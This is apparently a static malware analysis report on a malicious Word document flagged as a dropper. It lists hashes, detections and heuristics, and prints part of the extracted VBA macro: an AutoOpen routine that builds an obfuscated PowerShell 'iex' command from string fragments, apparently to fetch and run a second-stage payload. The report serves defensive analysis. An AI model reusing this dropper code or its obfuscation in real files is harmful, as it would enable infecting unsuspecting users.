Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8b0eaaf588ba69e6…

MALICIOUS

Office (OLE)

Size: 113.2 KB
Created: 2018-06-21 07:10:00
Authoring application: Microsoft Office Word
First seen: 2019-01-12
MD5: 0cc528875ca4e2605ec13e0fbf70d373
SHA-1: e920cc14ccaf48848070aa4e73df1daff89e8e73
SHA-256: 8b0eaaf588ba69e6515b704f0eaf1cc9fb83540fa4eef1309232e5c895e77a9f
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample contains a VBA macro with an AutoOpen function that calls Shell(). The macro assembles a PowerShell command from concatenated string fragments, as indicated by the string 'OwerSHell & ( $PShoME[21]+$PSHoME[30]+'x')' (the characters taken from $PSHOME spell out the missing letters of "iex"). The assembled command appears to be designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6602248-0' further supports its classification as a malicious dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6602248-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6602248-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15257 bytes
SHA-256: 91411ee9c70bc54bf87d5282a0680f4d8388fb2e357f04cea2ec686ac746ea0f

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Qljcplqh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AZQOujkCEf"
Function wqiWdupm()
On Error Resume Next
For Each izNnzJ In KRjkSO
nYiwU = 45147 + Atn(77086) / 81594 / Round(9342) / 96449 / CInt(lkDduf)
zBwNw = pCncla = pCwGMk
UEdvi = (lwnaO * 32251 + 21028 * CInt(mdtfU - CDbl(46340)) * 77006 * Oct(67953))
Next
imiwWfRfUS = "OwerSHell  &" + "( $PShoME[" + "21]+$PSHoM" + "E[30]+'x'"
For Each pDzXbn In wEoqi
wwZmB = 48568 + Atn(13951) / 48399 / Round(54602) / 66672 / CInt(tpXLz)
QzvYY = zzVki = LpCbfu
LDYNb = (AsYGz * 95510 + 78769 * CInt(ApfLIQ - CDbl(38331)) * 43434 * Oct(63090))
Next
MnvUauiH = ")(-JOiN( " + "'63J78<120" + "<66Q84w10" + "9n97!59n38x5" + "9<117J126<1" + "08t54s116" + "s121t113n1" + "26Q120!" + "111n59n105Q12" + "2!117s127w116"
For Each XbUFHz In EHSdpJ
iXOSId = 93617 + Atn(68980) / 53318 / Round(64878) / 99633 / CInt(uQsizt)
wwhtGd = TCjUjm = GRibDL
lZFkOq = (tzQuX * 32657 + 7296 * CInt(pKAsZE - CDbl(7270)) * 49549 * Oct(21230))
Next
cwVBiD = "a118x32!63" + "a92!120!108J7" + "9t113" + "x59!38Q59Q117s1" + "26n108w54J116Q" + "121J113Q126w1"
For Each KEOXWF In ClHab
nYBQf = 42093 + Atn(44800) / 39477 / Round(91823) / 86769 / CInt(zawZb)
rMkaK = BFdvoz = KYumX
zFQaT = (wAnjaw * 39412 + 78202 * CInt(hOniiQ - CDbl(2871)) * 60337 * Oct(38586))
Next
wjoIb = "20n" + "111J59t72Q98" + "Q104<111Q126" + "n118w53x85n12" + "6!111s53J76s" + "126s12" + "1n8"
For Each NZcHZ In qtDhwc
ozTjS = 91573 + Atn(78896) / 56407 / Round(7194) / 87574 / CInt(HQjwSz)
NOfKXc = arpFbT = PwlSJ
odiKj = (qvEEnH * 10786 + 24464 * CInt(zODsj - CDbl(18674)) * 62930 * Oct(25744))
Next
sFiqttQ = "8s119" + "Q114<126J1" + "17s111a32" + "w63x65!10" + "4x119s11" + "6t75" + "n76x59a38s59w60" + "n115x111<111n" + "10"
For Each YcPMPQ In wiwov
RXKlui = 81397 + Atn(92138) / 84922 / Round(94432) / 83376 / CInt(ddraXK)
kDYVRq = HvFjXd = XwmwpE
rXsFNu = (scnLXw * 85447 + 95452 * CInt(jTzzF - CDbl(88827)) * 62185 * Oct(9540))
Next
FFEhPpU = "7<" + "33s52" + "w52<10" + "9x126s97w11"
For Each WPCmNn In laBTw
DziVD = 10670 + Atn(62148) / 88041 / Round(58223) / 7768 / CInt(zSLEu)
lwzot = uYwAn = KLLmnj
AmSfOk = (MwMDI * 85261 + 69730 * CInt(EjXPl - CDbl(86980)) * 66150 * Oct(50916))
Next
QzRpkj = "5Q98J105!118w12" + "7n53t120<116t11" + "8w52Q90s" + "67s84s41n3" + "4n93n47<113n52<" + "91"
For Each mhTiR In JrzIuU
swGMCJ = 44563 + Atn(78663) / 54010 / Round(56680) / 75957 / CInt(ScrtW)
QolUV = GwmYSb = oGoon
czJLX = (GaujM * 42936 + 30384 * CInt(mCVfG - CDbl(32877)) * 87575 * Oct(343))
Next
nslrOPNSTjC = "x115" + "!111J11" + "1!107a33x52w52" + "a112n1" + "26s119w119" + "<98" + "t127J122n" + "105!112J1"
wqiWdupm = imiwWfRfUS + MnvUauiH + cwVBiD + wjoIb + sFiqttQ + FFEhPpU + QzRpkj + nslrOPNSTjC
End Function
Function uolWJ()
On Error Resume Next
For Each ulwnma In ztXOOq
nHJTbc = 93440 + Atn(87847) / 99218 / Round(38369) / 58231 / CInt(WaGCvd)
MfPFQ = aNmVa = UkjvD
dBHHJ = (iLzoiT * 97602 + 40679 * CInt(zXujC - CDbl(89681)) * 4990 * Oct(90700))
Next
nHNtzvooGNP = "26Q53<12" + "0a" + "116Q118t52n11" + "6Q84<45a41J4" + "4x121J52x91Q" + "115n"
For Each duzOQ In cukimL
zIjid = 89126 + Atn(50350) / 24729 / Round(95440) / 11479 / CInt(ZWZuB)
tmzhMO = IppLL = HCZZV
zLPnvs = (mIWAG * 68370 + 96900 * CInt(AJRpFi - CDbl(48907)) * 78367 * Oct(80087))
Next
ZTOpR = "111<111!" + "107!3" + "3<52" + "!52" + "x111x105x114<10" + "5a11" + "6s11" + "0s117w127Q53s"
For Each FFvIn In uJnoqK
RJFYvL = 86974 + Atn(97197) / 5488 / Round(34506) / 8711 / CInt(KniBiZ)
JLmZq = jCKaw = FhJpB
fIDRsk = (EVnmC * 28872 + 4826 * CInt(PolYFw - CDbl(40058)) * 39986 * Oct(49023))
Next
kYFVI = "12" + "0x116Q118" + "w52J95s120s6" + "6x"
For Each fihCz In ckujE
zmflBj = 24518 + Atn(49250) / 5858 / Round(61027) / 12598 / CInt(BZjTID)
jGGUS = zPwDou = kOswJ
QvlDP = (kPafr * 5271 + 33566 
... (truncated)